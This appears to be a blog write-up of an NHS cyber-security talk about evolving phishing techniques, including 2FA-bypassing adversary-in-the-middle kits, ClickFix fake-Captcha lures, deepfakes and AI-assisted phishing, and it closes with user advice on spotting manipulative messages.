NHS Cyber Associates Network – Beyond Phishing: The evolution of hacking humans
The Cyber Associates Network (CAN), which forms part of the NHS’s cyber security arm, hosted an NHS cyber threat analysis, Francis. Francis gave an insightful presentation on how phishing attacks are evolving.
The core of the presentation was that social engineering is still the primary weapon for phishing but with the use of AI, it has now become a more sophisticated landscape, making the traditionally ways of spotting phishing attacks less relevant.
Man in the middle attacks
A man-in-the-middle (MITM) attack, in its simplest form, is an attacker intercepting your data or connection, redirecting it or you somewhere else. An example of this would be you, the user, receives an email from your bank asking you to click on a link to log in, this email is a fake phishing email. Once you click on the link you are taken to the legitimate looking banking website but the details you enter will be sent in real time to the attacker.
There is a new and highly sophisticated version of this is called Tycoon 2FA which specifically targets two factor authentication. It is notable in that it can bypass 2FA. This attack works exactly as described above but with the additional step of being able to use the 2FA code that the user is sent and inputs.
Behind the scenes of this attack is an extremely complicated form of software that is using NHS.connect infrastructure. This attack is seeing a rise in data breaches within NHS.
This style of attack doesn’t have many ‘tells’ that users can be vigilant for. The best way to spot these is to check URLs that look suspicious and hyperlinks on the redirected page that don’t work.
Captcha attacks
Captcha is something that we’ll all be familiar with, being asked to prove that we’re human to enter a website by clicking on several images or answering a simple question.
An attack using Captcha is called click fix and sees the user inputting malicious code into the Windows Run dialog or terminal. The user will be presented with an initial seemingly genuine Captcha, like selecting buses, then a second captcha will ask the user to use keyboard shortcuts to open the Windows terminal and paste in the code that will deliver malware or a trojan.
This works because, as users we’re used to completing Captchas and many users are unfamiliar with the dialog and terminal boxes.
There is also a theoretical evolution of this that can use the Windows file explorer to achieve similar goals.
There are no simple ‘tells’ that users can be on the lookout for this style of attack. There are technical solutions to ‘lock down’ the terminal and dialog boxes but do require administration right and the technical know-how.
Deepfakes
Deepfakes use AI to create fake images, sounds, and video. In the context of phishing this is normally of people to try and gain trust and bypass security systems. Right now, we’re on the cusp of their capabilities and if you’re familiar with AI generated video and sounds, can be spotted. However, they are very quickly improving their abilities and becoming cheaper, lowering the barrier to entry. There have been many organisations and people that have fallen victim to phishing attacks using deepfakes, including a high-profile example of a UK-based energy firms parent companies CEO being impersonated (using AI voice) and stealing £243,000.
AI use in other phishing attacks
AI is also being used to help generate and review phishing messages, making them more believable and without the usual trappings of poor grammar and spelling.
AI can be used for ‘market research’. Asking AI to research an organisation, it’s mission, projects, leadership structure etc. This research can be done in the fraction of the time it would traditionally take, giving the attackers access to greater information about your organisation.
AI generated code. AI LLMs can be used to create code and scripts such ask malware and other viruses. Cyber security is increasingly seeing a rise in cyber-attacks as a service, where attacks buy malicious content from the dark web that can be easily deployed with little technical knowledge. Meaning the attacker doesn’t always have the knowledge to undo the damage they cause, even if a ransom is paid.
A separate style of attack that also tries to bypass traditional technical solutions is the use of QR codes within phishing emails. Directing users away from your IT infrastructure and to somewhere the attack can control.
Are there any solutions?
These more sophisticated attacks do present some real challenges. While there are technical solutions, the reality is that cyber security is playing catch up with cyber attackers.
For users, the best way to reduce the likelihood of being a victim of a phishing attack remains the same as previously thought. Recognise the emotive element to phishing attacks.
Authority: Is the message claiming to be from someone official? For example, your bank, a solicitor, CQC or a government department. Criminals often pretend to be important people or organisations to trick you into doing what they want.
Urgency: Are you told you have a limited time to respond (such as ‘within 24 hours’ or ‘immediately’)? Attackers often threaten you with fines or other consequences if you don’t respond quickly.
Emotion: Does the message make you panic, fearful, hopeful or curious? Attackers often use threatening language, make false claims of support, or tease you into wanting to find out more.
Scarcity: Is the message offering something in short supply, like concert tickets, money, or a cure for medical conditions? Fear of missing out on a good deal or opportunity can make you respond quickly.
Current events: Are you expecting to see a message like this? Attackers often exploit current news stories, big events, or specific times of year (like tax reporting) to make their scam seem more relevant to you.
If you have any specific concerns or would like to discuss this topic further, please contact daniel.plummer@rcpa.org.uk
